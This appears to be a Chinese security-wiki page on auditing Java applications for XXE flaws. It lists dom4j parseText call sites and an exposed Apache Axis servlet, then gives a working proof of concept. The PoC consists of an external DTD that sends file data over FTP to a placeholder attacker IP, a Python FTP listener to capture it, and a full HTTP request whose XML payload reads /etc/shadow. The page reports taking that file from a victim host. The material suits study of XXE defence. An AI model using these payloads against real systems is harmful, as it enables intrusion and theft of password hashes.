menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 007-XXE chevron_right 002-XXE 审计与利用思路.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    002-XXE 审计与利用思路.md
    5.26 KB / 2021-07-17 00:01:40
        ## XXE 审计与利用思路

第一处出现在系统使用的org.dom4j.DocumentHelper调用的类函数下。

在源码中搜索关键字DocumentHelper.parseText

得到:

```bash
\xxx\***\***.java 
Line 303:    document = DocumentHelper.parseText(xml);

\xxx\***\XmlParser.java 
Line 51:    Document doc = DocumentHelper.parseText(xmlStr);

\\xxx\***\***Task.java 
Line 350:    Document document = DocumentHelper.parseText(result);

\\xxx\***\***Action.java 
Line 237:    Document document = DocumentHelper.parseText(mapDataForOut);

\\xxx\***\xxxAction.java 
Line 259:    Document document = DocumentHelper.parseText(mapDataForOut);

\\xxx\***\xxx.java 
Line 120:    Document doc = DocumentHelper.parseText(policyXml.replaceAll("_lnx", ""));
Line 125:    doc = DocumentHelper.parseText(node.asXML());

\\xxx\***tion.java 
Line 109:    Document doc = DocumentHelper.parseText(xmlStr);

\\xxx\***.java 
Line 58:    doc = DocumentHelper.parseText(xml); // 将字符串转为XML

\xxx\***.java 
Line 92:    doc = DocumentHelper.parseText(xml);
Line 97:    oldDoc = DocumentHelper.parseText(vaildXml);

\\xxx\***ObjConverter.java 
Line 173:     Document document = DocumentHelper.parseText(xml);

\\xxx\***.java 
Line 949:     doc = DocumentHelper.parseText(infor.getContent());

\\xxx\***Utility.java 
Line 1203:     Document doc = DocumentHelper.parseText(result);

\\xxx\***xxxService.java 
Line 177:     Document doc = DocumentHelper.parseText(requestHeader);

\xxx\***\EventParser.java 
Line 83:    Document doc = DocumentHelper.parseText(xmlStr);
Line 185:    Document doc = DocumentHelper.parseText(xmlStr);
Line 229:    Document doc = DocumentHelper.parseText(xmlStr);
Line 306:    DocumentHelper.parseText(contentXml)).replaceAll("<", "&lt;").replaceAll(">", "&gt;").replaceAll("==amp;",  

\\xxx\***\XMLMessageUtil.java 
Line 24:    doc = DocumentHelper.parseText(xml);
Line 131:    tempDoc = DocumentHelper.parseText(xml);
Line 224:    document = DocumentHelper.parseText("<a><b></b></a>");

\xxx\***\XmlParser.java 
Line 51:    Document doc = DocumentHelper.parseText(xmlStr);

\\xxx\***.java 
Line 244:    Document doc = DocumentHelper.parseText(xmlStr);

```

其中,`\xxx\***\XMLMessageUtil.java`

![](images/security_wiki/15906403425540.png)


代码中 使用org.dom4j.DocumentHelper.parseTest解析XML文件

第二处,发现位置是在查看web.xml文件中AxisServlet的servlet-mapping配置,发现URL地址包含以下路径或后缀就可被攻击利用

```bash
***\WebRoot\WEB-INF\web.xml 
xxx\***\WebRoot\WEB-INF\web.xml
<servlet-mapping>
<servlet-name>AxisServlet</servlet-name>
       <url-pattern>/servlet/AxisServlet</url-pattern>
   </servlet-mapping>  
   <servlet-mapping>
       <servlet-name>AxisServlet</servlet-name>
       <url-pattern>*.jws</url-pattern>
   </servlet-mapping>
   <servlet-mapping>
       <servlet-name>AxisServlet</servlet-name>
       <url-pattern>/services/*</url-pattern>
   </servlet-mapping> 

```

在通过访问以下URL即可访问到AxisServlet服务,可对其进行XXE漏洞攻击。

```
https://www.baidu.com/xxx/servlet/AxisServlet
https://www.baidu.com/***/servlet/AxisServlet

```

### poc

0x1:

在复现时由于目标主机无法访问外网,所以需要在本地主机上搭建测试环境,具体的复现过程如下(嗯额这里感谢一下同事):

* 1)新建目录xxe_test,复制下面文件放入

test.dtd

```xml
<!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://ip/%data3;'>">

```

* 2)在xxe_test目录下运行如下命令,监听8080端口(检查防火墙是否开放该端口)

Python -m SimpleHTTPServer 8080

* 3)运行以下脚本,启动ftp服务器(检查防火墙是否开放21端口)

> Python xxe-ftp.py

```python
#!/usr/env/python
from __future__ import print_function
import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('0.0.0.0',21))
s.listen(1)
print('XXE-FTP listening ')
conn,addr = s.accept()
print('Connected by %s',addr)
conn.sendall('220 Staal XXE-FTP\r\n')
stop = False
while not stop:
    dp = str(conn.recv(1024))
    if dp.find("USER") > -1:
        conn.sendall("331 password please - version check\r\n")
    else:
        conn.sendall("230 more data please!\r\n")
    if dp.find("RETR")==0 or dp.find("QUIT")==0:
        stop = True
    if dp.find("CWD") > -1:
        print(dp.replace('CWD ','/',1).replace('\r\n',''),end='')
    else:
        print(dp)

conn.close()
s.close()

```

* 4)发送以下报文:

```bash
POST /xxx/*** HTTP/1.1
Host: www.baidu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/javascript, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
X-Requested-With: XMLHttpRequest
Referer: https://target_ip/xxx/***.jsp
ContentType: pplication/x-www-form-urlencoded
Cookie: JSESSIONID=WwV5E_ZpZVWhnIKEaFuuphs1.localhost; ops.cookie.principal=xxxxx
DNT: 1
Connection: close
Content-Type: text/xml
Content-Length: 159

<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/shadow">
<!ENTITY % sp SYSTEM "http://Your_IP/test.dtd">
%sp;
%param3;
%exfil;
]>

```

![](images/security_wiki/15906403819340.png)


**漏洞截图**:

0x1:

成功获取到受害主机的/etc/shadow文件

![](images/security_wiki/15906403895336.png)
    links
    file_download